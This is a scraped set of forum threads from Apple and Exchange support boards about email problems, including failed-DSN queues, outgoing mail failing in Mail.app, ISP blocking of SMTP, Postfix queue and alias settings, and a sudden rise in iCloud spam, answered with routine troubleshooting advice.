  I know we are not an open relay.
  Can anybody tell me how I can track down how or where in the system these scumbags are getting in?
  Really appreciate any help!
  Scott

  Forgot to show an image:

• Mail Queue filling up with DSN failures

  So my Exchange 2010 queue viewer keeps filling up with failed DSNs. There is no sender (except for [email protected]). I have done some searching and the first thing that everyone usually mentions as a cause is SPAM. It's not SPAM.  I know this
  for two reasons:
  1. We have a barracuda SPAM/AV firewall that all SMTP email goes through. None of these emails are there
  2. We can see the subject of the email. The subject is a cronjob email from our linux servers. "Undeliverable Cron <cronuser@>..." But there is no source email to be found. Our linux server is not sending any.
  Any idea what could be causing this?

  If they're DSNs, they could be sent from anywhere with a spoofed reply address.
  Ed Crowley MVP "There are seldom good technological solutions to behavioral problems."

• Outgoing Mail not working with Mail.app in 10.5.7

  I am helping my mom set up her email accounts on her new macbook laptop. It has 10.5.7
  I have tried setting up two different email accounts in mail.app, one is a roadrunner webmail account, and the other is a gmail account. For the roadrunner account, I followed their instructions, which can be seen here: http://help.rr.com/HMSFaqs/eOSXmail.aspx
  With the gmail account, mail.app was able to do the setup itself from the email address and password.
  I know that the account information is partially correct because with both the accounts they were able to correctly download email onto the computer into mail.app. But both accounts have not been able to successfully send an email.
  I can provide any other information about the settings used in the outgoing server or advanced information if it would be helpful.

  This is so strange. The exact same thing happened to me yesterday. Suddenly, on my Mac and my PC, I was no longer able to SEND email. I am able to receive email...just not send. I too am a Comcast customer. I contacted Comcast and they, of course, said the problem had to do with the servers that my email client is trying to access and that it had nothing to do with them. We then set up my Comcast.net email account (which I never use) and it worked fine (sending and receiving).
  So, I switched my other accounts to use Comcast's smtp server and that worked on the Mac only. I can now send email on my Mac but not on my PC.
  This leads me to believe that it is not something wrong with my email client (since I have the problem on both my Mac and PC) but instead, something is up with Comcast.
  I checked and it turns out that Comcast just implemented a new Acceptable Use Policy which specifically implements a NEW traffic management policy. This was JUST implemented this month. So, I am getting the sneaking suspicion that Comcast is somehow denying me access to those SMTP servers and I have to use their SMTP server instead.
  Does this make any sense to anyone???? I am at a total loss here.
  Thanks,
  Susan

• Mail Queue Filling Up

  Came into the office this morning and everyone is complaining they didn't get any email over the weekend. I log into SA to notice over 300 emails stuck in the queue. I found a couple threads regarding this and this one particularly is almost my exact situation:
  http://discussions.apple.com/thread.jspa?messageID=1891076&
  With the exception of upgrading the OS. I did actually have to add a virtual IP address to the same NIC that has the IP for our email. I did this because I was having SSL issues:
  http://discussions.apple.com/thread.jspa?threadID=612479&tstart=0
  Since I wasn't adding a new IP and not so much changing an IP, I didn't use the "changeip" command. Following some of the instructions from the above mentioned thread, I ran "sudo postsuper -r ALL" and this didn't seem to help at all. I then issued a "/sbin/reboot" to restart the email server and now it is in the process of sending all the email that are in the queue. Send and receive email is working properly.
  So why the post since I have solved my own problem?
  Because it makes me nervous that after adding an additional real-world IP to the extra NIC installed on the server, that it has been behaving this.
  So... any thoughts or suggestions on how to prevent this in the future or how to fix this? Thanks.

  Ahhh! Yes, I did create an actual user for postmaster
  and am using it so I could have an additional email
  account in Mail.app to monitor email that was
  improperly addressed. Usually I find about 1-2
  emails a week where someone improperly mis-spelled
  someones address and therefore I send it on to the
  right place.
  Should I delete the "postmaster" account in WGM? But
  then how would I be able to check it's email?
  Have a look in /etc/postfix/alias. The alias name is on the left (postmaster) and the name of the mail account used for it is on the right. Replace with your own short name or another (I usually set up a separate mailadmin user). But I don't really think that is causing your problem - its the actual receiving undeliverable mail which is generating the bounces back out.
  Also in /etc/postfix/main.cf what's the difference
  between "myhostname" and "mydomain". I have them
  both configured the same with "mail.domain.com".
  Should one be "domain.com" and the other
  "mail.domain.com"?
  myhostname is normally your hostname ( eg mail.domain.com) - what you want your server to use in its 'helo' command. Ideally should be the same as your MX record (and PTR record for your IP). Ideally they should all match but sometimes difficult.
  mydomain - eg domain.com
  Note that you will have to put the domain into the Local Hosts Alias pane (if not already there) if you previously only had it as your myhostname.
  -david

• Suddenly - iCloud filled with spam

  I've never had any problem with junk email/spam sent to my me.com (iCloud email address). Nor has my husband.
  As of about four or five days ago - just before Christmas - suddenly we were receiving 4, 5, 8, 10+ spam messages a day each.
  We mark them as junk mail. We forward as many as we feel like to [email protected] (it gets tiresome) - including headers. We have reported this to www.apple.com/feedback/icloud.html
  But it's still coming - we realize this seems to be a fairly new, universal (to iCloud) problem.
  Just wanted to add my annoyed voice to the conversation and to express my hope that Apple will fix whatever needs to be fixed. We've never been thrilled with iCloud

  Likewise -- just started getting a lot of SPAM as well to my @me.com address
  Historically never gotten any -- now it comes 4-5 message all within about 30-60 minutes, once a day -- all have a single JPG advertisement in the message and all messages seem to be different
  Really odd...

• Gmail smtp (outgoing) mail not working with apple mail 5

  Hi,
  I have a numbe of gmail accounts, I can receive mail through the new apple mail 5 client but can't send any at all.
  I've tried everything gmail help suggests but to no avail...
  Cheers,
  Alex

  Have you use the correct outgoing server - smtp.mail.me.com and SSL is required. I would suggest removing the account and starting again, following the instructions applicable to Leopard in this page:
  iCloud and Snow Leopard

• How do I get outgoing mail to work with maverick update?!?!

  Argh!!  I am a longtime Apple customer, but I am getting sick of this!
  I get no outoging mail with the Mavericks update.  What to do????
  THANKS

  Hi there kmorton2,
  You may find the troubleshooting steps in the article below helpful.
  OS X Mail: Troubleshooting sending and receiving email messages
  http://support.apple.com/kb/ts3276
  -Griff W.